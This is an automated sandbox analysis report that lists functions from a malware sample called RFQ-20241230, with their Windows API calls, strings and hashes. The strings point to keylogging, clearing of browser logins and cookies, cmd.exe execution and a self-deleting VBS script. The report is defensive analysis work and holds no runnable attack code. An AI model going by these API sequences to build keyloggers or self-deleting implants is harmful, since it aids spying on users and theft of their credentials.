                            • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                            • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                            Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                              • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                            • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                            • String ID: /sort "Visit Time" /stext "$8>G
                            • API String ID: 368326130-2663660666
                            • Opcode ID: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
                            • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                            • Opcode Fuzzy Hash: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
                            • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                            Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                            • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread$LocalTimewsprintf
                            • String ID: Offline Keylogger Started
                            • API String ID: 465354869-4114347211
                            • Opcode ID: 5ea4053e1a56471162166040b7adf2f927a814dce7017fd5fa1547eff60e0d80
                            • Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
                            • Opcode Fuzzy Hash: 5ea4053e1a56471162166040b7adf2f927a814dce7017fd5fa1547eff60e0d80
                            • Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
                            Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                            • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                            • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread$LocalTime$wsprintf
                            • String ID: Online Keylogger Started
                            • API String ID: 112202259-1258561607
                            • Opcode ID: e9ef4b4ce2fe67d916c62a364ac3e8c7c3b8e9b8d94d7f8099fcb04cbe9a102f
                            • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                            • Opcode Fuzzy Hash: e9ef4b4ce2fe67d916c62a364ac3e8c7c3b8e9b8d94d7f8099fcb04cbe9a102f
                            • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                            Function 0044AA83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                            • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                            • __dosmaperr.LIBCMT ref: 0044AB0E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseErrorHandleLast__dosmaperr
                            • String ID: `@
                            • API String ID: 2583163307-951712118
                            • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                            • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                            • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                            • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                            Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                            • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                            • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandleObjectSingleWait
                            • String ID: Connection Timeout
                            • API String ID: 2055531096-499159329
                            • Opcode ID: 0c4e7447b4df129858c303fea986e9e9d1e62a01682a0eac217bcd46973c6bc4
                            • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                            • Opcode Fuzzy Hash: 0c4e7447b4df129858c303fea986e9e9d1e62a01682a0eac217bcd46973c6bc4
                            • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                            Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                            Download Yara Rule
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                              • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                              • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                            • String ID: bad locale name
                            • API String ID: 3628047217-1405518554
                            • Opcode ID: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
                            • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                            • Opcode Fuzzy Hash: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
                            • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                            Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell
                            • String ID: /C $cmd.exe$open
                            • API String ID: 587946157-3896048727
                            • Opcode ID: fc1d9d8a200ebad5940102133050edab2b9e71f7596d6ef5b18c1bd3a17f0ddd
                            • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                            • Opcode Fuzzy Hash: fc1d9d8a200ebad5940102133050edab2b9e71f7596d6ef5b18c1bd3a17f0ddd
                            • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                            Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                            Download Yara Rule
                            APIs
                            • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                            • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                            • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: TerminateThread$HookUnhookWindows
                            • String ID: pth_unenc
                            • API String ID: 3123878439-4028850238
                            • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                            • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                            • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                            • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                            Function 00401430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                            • GetProcAddress.KERNEL32(00000000), ref: 00401441
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: GetCursorInfo$User32.dll
                            • API String ID: 1646373207-2714051624
                            • Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                            • Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
                            • Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                            • Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E
                            Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                            • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetLastInputInfo$User32.dll
                            • API String ID: 2574300362-1519888992
                            • Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                            • Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
                            • Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                            • Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F
                            Function 00448D1B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: __alldvrm$_strrchr
                            • String ID:
                            • API String ID: 1036877536-0
                            • Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                            • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                            • Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                            • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                            Function 004559DA Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 3664c7d1b7189549baf4d493e5c665213dd82d933dd96c7687bae007d5c3c42b
                            • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                            • Opcode Fuzzy Hash: 3664c7d1b7189549baf4d493e5c665213dd82d933dd96c7687bae007d5c3c42b
                            • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                            Function 00441A91 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                            • Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
                            • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                            • Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784
                            Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                            • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                            • String ID:
                            • API String ID: 3360349984-0
                            • Opcode ID: 54d56c26835f845e219b8fbcfbfaee96f182a1e2e5f8d4c6d7efe874cd7b3d0f
                            • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                            • Opcode Fuzzy Hash: 54d56c26835f845e219b8fbcfbfaee96f182a1e2e5f8d4c6d7efe874cd7b3d0f
                            • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                            Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            • Cleared browsers logins and cookies., xrefs: 0040B8EF
                            • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                            • API String ID: 3472027048-1236744412
                            • Opcode ID: a560be4e93f7145764f14036b9ba5e851196c21c3d51501819e25b145e9be97c
                            • Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
                            • Opcode Fuzzy Hash: a560be4e93f7145764f14036b9ba5e851196c21c3d51501819e25b145e9be97c
                            • Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF
                            Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                            • Sleep.KERNEL32(00000BB8), ref: 004115C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQuerySleepValue
                            • String ID: @CG$exepath$BG
                            • API String ID: 4119054056-3221201242
                            • Opcode ID: 7e871a5e45cf0c5aa995f5861383ecd3664757752265a40acd77ba434a7e4b44
                            • Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
                            • Opcode Fuzzy Hash: 7e871a5e45cf0c5aa995f5861383ecd3664757752265a40acd77ba434a7e4b44
                            • Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD
                            Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                              • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                              • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                            • Sleep.KERNEL32(000001F4), ref: 00409C95
                            • Sleep.KERNEL32(00000064), ref: 00409D1F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$SleepText$ForegroundLength
                            • String ID: [ $ ]
                            • API String ID: 3309952895-93608704
                            • Opcode ID: 98d6b66478057358495496a018cf8b974f91cae2485f626915356807bc928fff
                            • Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
                            • Opcode Fuzzy Hash: 98d6b66478057358495496a018cf8b974f91cae2485f626915356807bc928fff
                            • Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF
                            Function 0041B59F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                            • CloseHandle.KERNEL32(00000000), ref: 0041B61C
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                            • Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
                            • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                            • Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE
                            Function 00442CE2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                            • Instruction ID: dab0b0a7df633c5b48e856b81aae527c8b914588f9bdc990e5f583acd93a84b2
                            • Opcode Fuzzy Hash: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                            • Instruction Fuzzy Hash: 5701F2F2A097163EF62116792CC0F6B670DDF413B9B31073BB921622E1EAE8CC42506C
                            Function 00442D61 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                            • Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
                            • Opcode Fuzzy Hash: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                            • Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179
                            Function 00438105 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                              • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                              • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                            • _UnwindNestedFrames.LIBCMT ref: 00438134
                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                            • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                            • String ID:
                            • API String ID: 737400349-0
                            • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                            • Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
                            • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                            • Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4
                            Function 00447220 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                            • GetLastError.KERNEL32(?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                            • Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
                            • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                            • Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8
                            Function 0041B62A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
                            • CloseHandle.KERNEL32(00000000), ref: 0041B68A
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleReadSize
                            • String ID:
                            • API String ID: 3919263394-0
                            • Opcode ID: 84c524a448c010b9be172ba78faf3346c00c98969e38f24d930284b8d2add881
                            • Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
                            • Opcode Fuzzy Hash: 84c524a448c010b9be172ba78faf3346c00c98969e38f24d930284b8d2add881
                            • Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA
                            Function 0041851C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                            Download Yara Rule
                            APIs
                            • GetSystemMetrics.USER32(0000004C), ref: 00418529
                            • GetSystemMetrics.USER32(0000004D), ref: 0041852F
